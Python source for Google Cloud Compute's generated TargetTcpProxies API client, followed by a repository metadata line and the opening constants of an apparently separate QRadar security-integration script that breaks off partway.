# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import os
import re
from typing import Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core import client_options as client_options_lib
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
try:
OptionalRetry = Union[retries.Retry, gapic_v1.method._MethodDefault]
except AttributeError: # pragma: NO COVER
OptionalRetry = Union[retries.Retry, object] # type: ignore
from google.cloud.compute_v1.services.target_tcp_proxies import pagers
from google.cloud.compute_v1.types import compute
from .transports.base import TargetTcpProxiesTransport, DEFAULT_CLIENT_INFO
from .transports.rest import TargetTcpProxiesRestTransport
class TargetTcpProxiesClientMeta(type):
"""Metaclass for the TargetTcpProxies client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = (
OrderedDict()
) # type: Dict[str, Type[TargetTcpProxiesTransport]]
_transport_registry["rest"] = TargetTcpProxiesRestTransport
def get_transport_class(cls, label: str = None,) -> Type[TargetTcpProxiesTransport]:
"""Returns an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class TargetTcpProxiesClient(metaclass=TargetTcpProxiesClientMeta):
"""The TargetTcpProxies API."""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Converts api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = "compute.googleapis.com"
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
TargetTcpProxiesClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(info)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
TargetTcpProxiesClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> TargetTcpProxiesTransport:
"""Returns the transport used by the client instance.
Returns:
TargetTcpProxiesTransport: The transport used by the client
instance.
"""
return self._transport
@staticmethod
def common_billing_account_path(billing_account: str,) -> str:
"""Returns a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str, str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str,) -> str:
"""Returns a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder,)
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str, str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str,) -> str:
"""Returns a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization,)
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str, str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str,) -> str:
"""Returns a fully-qualified project string."""
return "projects/{project}".format(project=project,)
@staticmethod
def parse_common_project_path(path: str) -> Dict[str, str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str,) -> str:
"""Returns a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(
project=project, location=location,
)
@staticmethod
def parse_common_location_path(path: str) -> Dict[str, str]:
"""Parse a location path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path)
return m.groupdict() if m else {}
@classmethod
def get_mtls_endpoint_and_cert_source(
cls, client_options: Optional[client_options_lib.ClientOptions] = None
):
"""Return the API endpoint and client cert source for mutual TLS.
The client cert source is determined in the following order:
(1) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is not "true", the
client cert source is None.
(2) if `client_options.client_cert_source` is provided, use the provided one; if the
default client cert source exists, use the default one; otherwise the client cert
source is None.
The API endpoint is determined in the following order:
(1) if `client_options.api_endpoint` if provided, use the provided one.
(2) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is "always", use the
default mTLS endpoint; if the environment variabel is "never", use the default API
endpoint; otherwise if client cert source exists, use the default mTLS endpoint, otherwise
use the default API endpoint.
More details can be found at https://google.aip.dev/auth/4114.
Args:
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. Only the `api_endpoint` and `client_cert_source` properties may be used
in this method.
Returns:
Tuple[str, Callable[[], Tuple[bytes, bytes]]]: returns the API endpoint and the
client cert source to use.
Raises:
google.auth.exceptions.MutualTLSChannelError: If any errors happen.
"""
if client_options is None:
client_options = client_options_lib.ClientOptions()
use_client_cert = os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false")
use_mtls_endpoint = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_client_cert not in ("true", "false"):
raise ValueError(
"Environment variable `GOOGLE_API_USE_CLIENT_CERTIFICATE` must be either `true` or `false`"
)
if use_mtls_endpoint not in ("auto", "never", "always"):
raise MutualTLSChannelError(
"Environment variable `GOOGLE_API_USE_MTLS_ENDPOINT` must be `never`, `auto` or `always`"
)
# Figure out the client cert source to use.
client_cert_source = None
if use_client_cert == "true":
if client_options.client_cert_source:
client_cert_source = client_options.client_cert_source
elif mtls.has_default_client_cert_source():
client_cert_source = mtls.default_client_cert_source()
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
elif use_mtls_endpoint == "always" or (
use_mtls_endpoint == "auto" and client_cert_source
):
api_endpoint = cls.DEFAULT_MTLS_ENDPOINT
else:
api_endpoint = cls.DEFAULT_ENDPOINT
return api_endpoint, client_cert_source
def __init__(
self,
*,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Union[str, TargetTcpProxiesTransport, None] = None,
client_options: Optional[client_options_lib.ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the target tcp proxies client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, TargetTcpProxiesTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
api_endpoint, client_cert_source_func = self.get_mtls_endpoint_and_cert_source(
client_options
)
api_key_value = getattr(client_options, "api_key", None)
if api_key_value and credentials:
raise ValueError(
"client_options.api_key and credentials are mutually exclusive"
)
# Save or instantiate the transport.
# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, TargetTcpProxiesTransport):
# transport is a TargetTcpProxiesTransport instance.
if credentials or client_options.credentials_file or api_key_value:
raise ValueError(
"When providing a transport instance, "
"provide its credentials directly."
)
if client_options.scopes:
raise ValueError(
"When providing a transport instance, provide its scopes "
"directly."
)
self._transport = transport
else:
import google.auth._default # type: ignore
if api_key_value and hasattr(
google.auth._default, "get_api_key_credentials"
):
credentials = google.auth._default.get_api_key_credentials(
api_key_value
)
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials,
credentials_file=client_options.credentials_file,
host=api_endpoint,
scopes=client_options.scopes,
client_cert_source_for_mtls=client_cert_source_func,
quota_project_id=client_options.quota_project_id,
client_info=client_info,
always_use_jwt_access=True,
)
def delete_unary(
self,
request: Union[compute.DeleteTargetTcpProxyRequest, dict] = None,
*,
project: str = None,
target_tcp_proxy: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> compute.Operation:
r"""Deletes the specified TargetTcpProxy resource.
Args:
request (Union[google.cloud.compute_v1.types.DeleteTargetTcpProxyRequest, dict]):
The request object. A request message for
TargetTcpProxies.Delete. See the method description for
details.
project (str):
Project ID for this request.
This corresponds to the ``project`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
target_tcp_proxy (str):
Name of the TargetTcpProxy resource
to delete.
This corresponds to the ``target_tcp_proxy`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.compute_v1.types.Operation:
Represents an Operation resource. Google Compute Engine
has three Operation resources: \*
[Global](/compute/docs/reference/rest/v1/globalOperations)
\*
[Regional](/compute/docs/reference/rest/v1/regionOperations)
\*
[Zonal](/compute/docs/reference/rest/v1/zoneOperations)
You can use an operation resource to manage asynchronous
API requests. For more information, read Handling API
responses. Operations can be global, regional or zonal.
- For global operations, use the globalOperations
resource. - For regional operations, use the
regionOperations resource. - For zonal operations, use
the zonalOperations resource. For more information, read
Global, Regional, and Zonal Resources.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([project, target_tcp_proxy])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a compute.DeleteTargetTcpProxyRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, compute.DeleteTargetTcpProxyRequest):
request = compute.DeleteTargetTcpProxyRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if project is not None:
request.project = project
if target_tcp_proxy is not None:
request.target_tcp_proxy = target_tcp_proxy
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.delete]
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def get(
self,
request: Union[compute.GetTargetTcpProxyRequest, dict] = None,
*,
project: str = None,
target_tcp_proxy: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> compute.TargetTcpProxy:
r"""Returns the specified TargetTcpProxy resource. Gets a
list of available target TCP proxies by making a list()
request.
Args:
request (Union[google.cloud.compute_v1.types.GetTargetTcpProxyRequest, dict]):
The request object. A request message for
TargetTcpProxies.Get. See the method description for
details.
project (str):
Project ID for this request.
This corresponds to the ``project`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
target_tcp_proxy (str):
Name of the TargetTcpProxy resource
to return.
This corresponds to the ``target_tcp_proxy`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.compute_v1.types.TargetTcpProxy:
Represents a Target TCP Proxy
resource. A target TCP proxy is a
component of a TCP Proxy load balancer.
Global forwarding rules reference target
TCP proxy, and the target proxy then
references an external backend service.
For more information, read TCP Proxy
Load Balancing overview.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([project, target_tcp_proxy])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a compute.GetTargetTcpProxyRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, compute.GetTargetTcpProxyRequest):
request = compute.GetTargetTcpProxyRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if project is not None:
request.project = project
if target_tcp_proxy is not None:
request.target_tcp_proxy = target_tcp_proxy
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get]
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def insert_unary(
self,
request: Union[compute.InsertTargetTcpProxyRequest, dict] = None,
*,
project: str = None,
target_tcp_proxy_resource: compute.TargetTcpProxy = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> compute.Operation:
r"""Creates a TargetTcpProxy resource in the specified
project using the data included in the request.
Args:
request (Union[google.cloud.compute_v1.types.InsertTargetTcpProxyRequest, dict]):
The request object. A request message for
TargetTcpProxies.Insert. See the method description for
details.
project (str):
Project ID for this request.
This corresponds to the ``project`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
target_tcp_proxy_resource (google.cloud.compute_v1.types.TargetTcpProxy):
The body resource for this request
This corresponds to the ``target_tcp_proxy_resource`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.compute_v1.types.Operation:
Represents an Operation resource. Google Compute Engine
has three Operation resources: \*
[Global](/compute/docs/reference/rest/v1/globalOperations)
\*
[Regional](/compute/docs/reference/rest/v1/regionOperations)
\*
[Zonal](/compute/docs/reference/rest/v1/zoneOperations)
You can use an operation resource to manage asynchronous
API requests. For more information, read Handling API
responses. Operations can be global, regional or zonal.
- For global operations, use the globalOperations
resource. - For regional operations, use the
regionOperations resource. - For zonal operations, use
the zonalOperations resource. For more information, read
Global, Regional, and Zonal Resources.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([project, target_tcp_proxy_resource])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a compute.InsertTargetTcpProxyRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, compute.InsertTargetTcpProxyRequest):
request = compute.InsertTargetTcpProxyRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if project is not None:
request.project = project
if target_tcp_proxy_resource is not None:
request.target_tcp_proxy_resource = target_tcp_proxy_resource
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.insert]
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def list(
self,
request: Union[compute.ListTargetTcpProxiesRequest, dict] = None,
*,
project: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListPager:
r"""Retrieves the list of TargetTcpProxy resources
available to the specified project.
Args:
request (Union[google.cloud.compute_v1.types.ListTargetTcpProxiesRequest, dict]):
The request object. A request message for
TargetTcpProxies.List. See the method description for
details.
project (str):
Project ID for this request.
This corresponds to the ``project`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.compute_v1.services.target_tcp_proxies.pagers.ListPager:
Contains a list of TargetTcpProxy
resources.
Iterating over this object will yield
results and resolve additional pages
automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([project])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a compute.ListTargetTcpProxiesRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, compute.ListTargetTcpProxiesRequest):
request = compute.ListTargetTcpProxiesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if project is not None:
request.project = project
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.list]
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
def set_backend_service_unary(
self,
request: Union[compute.SetBackendServiceTargetTcpProxyRequest, dict] = None,
*,
project: str = None,
target_tcp_proxy: str = None,
target_tcp_proxies_set_backend_service_request_resource: compute.TargetTcpProxiesSetBackendServiceRequest = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> compute.Operation:
r"""Changes the BackendService for TargetTcpProxy.
Args:
request (Union[google.cloud.compute_v1.types.SetBackendServiceTargetTcpProxyRequest, dict]):
The request object. A request message for
TargetTcpProxies.SetBackendService. See the method
description for details.
project (str):
Project ID for this request.
This corresponds to the ``project`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
target_tcp_proxy (str):
Name of the TargetTcpProxy resource
whose BackendService resource is to be
set.
This corresponds to the ``target_tcp_proxy`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
target_tcp_proxies_set_backend_service_request_resource (google.cloud.compute_v1.types.TargetTcpProxiesSetBackendServiceRequest):
The body resource for this request
This corresponds to the ``target_tcp_proxies_set_backend_service_request_resource`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.compute_v1.types.Operation:
Represents an Operation resource. Google Compute Engine
has three Operation resources: \*
[Global](/compute/docs/reference/rest/v1/globalOperations)
\*
[Regional](/compute/docs/reference/rest/v1/regionOperations)
\*
[Zonal](/compute/docs/reference/rest/v1/zoneOperations)
You can use an operation resource to manage asynchronous
API requests. For more information, read Handling API
responses. Operations can be global, regional or zonal.
- For global operations, use the globalOperations
resource. - For regional operations, use the
regionOperations resource. - For zonal operations, use
the zonalOperations resource. For more information, read
Global, Regional, and Zonal Resources.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any(
[
project,
target_tcp_proxy,
target_tcp_proxies_set_backend_service_request_resource,
]
)
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a compute.SetBackendServiceTargetTcpProxyRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, compute.SetBackendServiceTargetTcpProxyRequest):
request = compute.SetBackendServiceTargetTcpProxyRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if project is not None:
request.project = project
if target_tcp_proxy is not None:
request.target_tcp_proxy = target_tcp_proxy
if target_tcp_proxies_set_backend_service_request_resource is not None:
request.target_tcp_proxies_set_backend_service_request_resource = (
target_tcp_proxies_set_backend_service_request_resource
)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.set_backend_service]
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def set_proxy_header_unary(
self,
request: Union[compute.SetProxyHeaderTargetTcpProxyRequest, dict] = None,
*,
project: str = None,
target_tcp_proxy: str = None,
target_tcp_proxies_set_proxy_header_request_resource: compute.TargetTcpProxiesSetProxyHeaderRequest = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> compute.Operation:
r"""Changes the ProxyHeaderType for TargetTcpProxy.
Args:
request (Union[google.cloud.compute_v1.types.SetProxyHeaderTargetTcpProxyRequest, dict]):
The request object. A request message for
TargetTcpProxies.SetProxyHeader. See the method
description for details.
project (str):
Project ID for this request.
This corresponds to the ``project`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
target_tcp_proxy (str):
Name of the TargetTcpProxy resource
whose ProxyHeader is to be set.
This corresponds to the ``target_tcp_proxy`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
target_tcp_proxies_set_proxy_header_request_resource (google.cloud.compute_v1.types.TargetTcpProxiesSetProxyHeaderRequest):
The body resource for this request
This corresponds to the ``target_tcp_proxies_set_proxy_header_request_resource`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.compute_v1.types.Operation:
Represents an Operation resource. Google Compute Engine
has three Operation resources: \*
[Global](/compute/docs/reference/rest/v1/globalOperations)
\*
[Regional](/compute/docs/reference/rest/v1/regionOperations)
\*
[Zonal](/compute/docs/reference/rest/v1/zoneOperations)
You can use an operation resource to manage asynchronous
API requests. For more information, read Handling API
responses. Operations can be global, regional or zonal.
- For global operations, use the globalOperations
resource. - For regional operations, use the
regionOperations resource. - For zonal operations, use
the zonalOperations resource. For more information, read
Global, Regional, and Zonal Resources.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any(
[
project,
target_tcp_proxy,
target_tcp_proxies_set_proxy_header_request_resource,
]
)
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a compute.SetProxyHeaderTargetTcpProxyRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, compute.SetProxyHeaderTargetTcpProxyRequest):
request = compute.SetProxyHeaderTargetTcpProxyRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if project is not None:
request.project = project
if target_tcp_proxy is not None:
request.target_tcp_proxy = target_tcp_proxy
if target_tcp_proxies_set_proxy_header_request_resource is not None:
request.target_tcp_proxies_set_proxy_header_request_resource = (
target_tcp_proxies_set_proxy_header_request_resource
)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.set_proxy_header]
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
"""Releases underlying transport's resources.
.. warning::
ONLY use as a context manager if the transport is NOT shared
with other clients! Exiting the with block will CLOSE the transport
and may cause errors in other clients!
"""
self.transport.close()
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution("google-cloud-compute",).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
__all__ = ("TargetTcpProxiesClient",)
|
googleapis/python-compute
|
google/cloud/compute_v1/services/target_tcp_proxies/client.py
|
Python
|
apache-2.0
| 42,291
| 0.001537
|
import concurrent.futures
import secrets
from enum import Enum
from ipaddress import ip_address
from typing import Tuple, Set, Dict, Callable
from urllib import parse
import pytz
import urllib3
from CommonServerUserPython import * # noqa
from CommonServerPython import * # noqa # pylint: disable=unused-wildcard-import
# Disable insecure warnings
urllib3.disable_warnings() # pylint: disable=no-member
''' ADVANCED GLOBAL PARAMETERS '''
SAMPLE_SIZE = 2 # number of samples to store in integration context
EVENTS_INTERVAL_SECS = 15 # interval between events polling
EVENTS_FAILURE_LIMIT = 3 # amount of consecutive failures events fetch will tolerate
FAILURE_SLEEP = 15 # sleep between consecutive failures events fetch
FETCH_SLEEP = 60 # sleep between fetches
BATCH_SIZE = 100 # batch size used for offense ip enrichment
OFF_ENRCH_LIMIT = BATCH_SIZE * 10 # max amount of IPs to enrich per offense
MAX_WORKERS = 8 # max concurrent workers used for events enriching
DOMAIN_ENRCH_FLG = 'true' # when set to true, will try to enrich offense and assets with domain names
RULES_ENRCH_FLG = 'true' # when set to true, will try to enrich offense with rule names
MAX_FETCH_EVENT_RETIRES = 3 # max iteration to try search the events of an offense
SLEEP_FETCH_EVENT_RETIRES = 10 # sleep between iteration to try search the events of an offense
MAX_NUMBER_OF_OFFENSES_TO_CHECK_SEARCH = 5 # Number of offenses to check during mirroring if search was completed.
DEFAULT_EVENTS_TIMEOUT = 30 # default timeout for the events enrichment in minutes
PROFILING_DUMP_ROWS_LIMIT = 20
ADVANCED_PARAMETERS_STRING_NAMES = [
'DOMAIN_ENRCH_FLG',
'RULES_ENRCH_FLG',
]
ADVANCED_PARAMETER_INT_NAMES = [
'EVENTS_INTERVAL_SECS',
'EVENTS_FAILURE_LIMIT',
'FAILURE_SLEEP',
'FETCH_SLEEP',
'BATCH_SIZE',
'OFF_ENRCH_LIMIT',
'MAX_WORKERS',
'MAX_FETCH_EVENT_RETIRES',
'SLEEP_FETCH_EVENT_RETIRES',
'DEFAULT_EVENTS_TIMEOUT',
'PROFILING_DUMP_ROWS_LIMIT',
]
''' CONSTANTS '''
API_USERNAME = '_api_token_key'
RESET_KEY = 'reset'
LAST_FETCH_KEY = 'id'
MINIMUM_API_VERSION = 10.1
DEFAULT_RANGE_VALUE = '0-49'
DEFAULT_TIMEOUT_VALUE = '35'
DEFAULT_LIMIT_VALUE = 50
MAXIMUM_MIRROR_LIMIT = 100
DEFAULT_EVENTS_LIMIT = 20
MAXIMUM_OFFENSES_PER_FETCH = 50
DEFAULT_OFFENSES_PER_FETCH = 20
DEFAULT_MIRRORING_DIRECTION = 'No Mirroring'
MIRROR_OFFENSE_AND_EVENTS = 'Mirror Offense and Events'
MIRROR_DIRECTION: Dict[str, Optional[str]] = {
'No Mirroring': None,
'Mirror Offense': 'In',
MIRROR_OFFENSE_AND_EVENTS: 'In'
}
MIRRORED_OFFENSES_CTX_KEY = 'mirrored_offenses'
UPDATED_MIRRORED_OFFENSES_CTX_KEY = 'updated_mirrored_offenses'
RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY = 'resubmitted_mirrored_offenses'
UTC_TIMEZONE = pytz.timezone('utc')
ID_QUERY_REGEX = re.compile(r'(?:\s+|^)id((\s)*)>(=?)((\s)*)((\d)+)(?:\s+|$)')
ASCENDING_ID_ORDER = '+id'
EXECUTOR = concurrent.futures.ThreadPoolExecutor(max_workers=MAX_WORKERS)
''' OUTPUT FIELDS REPLACEMENT MAPS '''
OFFENSE_OLD_NEW_NAMES_MAP = {
'credibility': 'Credibility',
'relevance': 'Relevance',
'severity': 'Severity',
'assigned_to': 'AssignedTo',
'destination_networks': 'DestinationHostname',
'status': 'Status',
'closing_user': 'ClosingUser',
'closing_reason_id': 'ClosingReason',
'close_time': 'CloseTime',
'categories': 'Categories',
'follow_up': 'Followup',
'id': 'ID',
'description': 'Description',
'source_address_ids': 'SourceAddress',
'local_destination_address_ids': 'DestinationAddress',
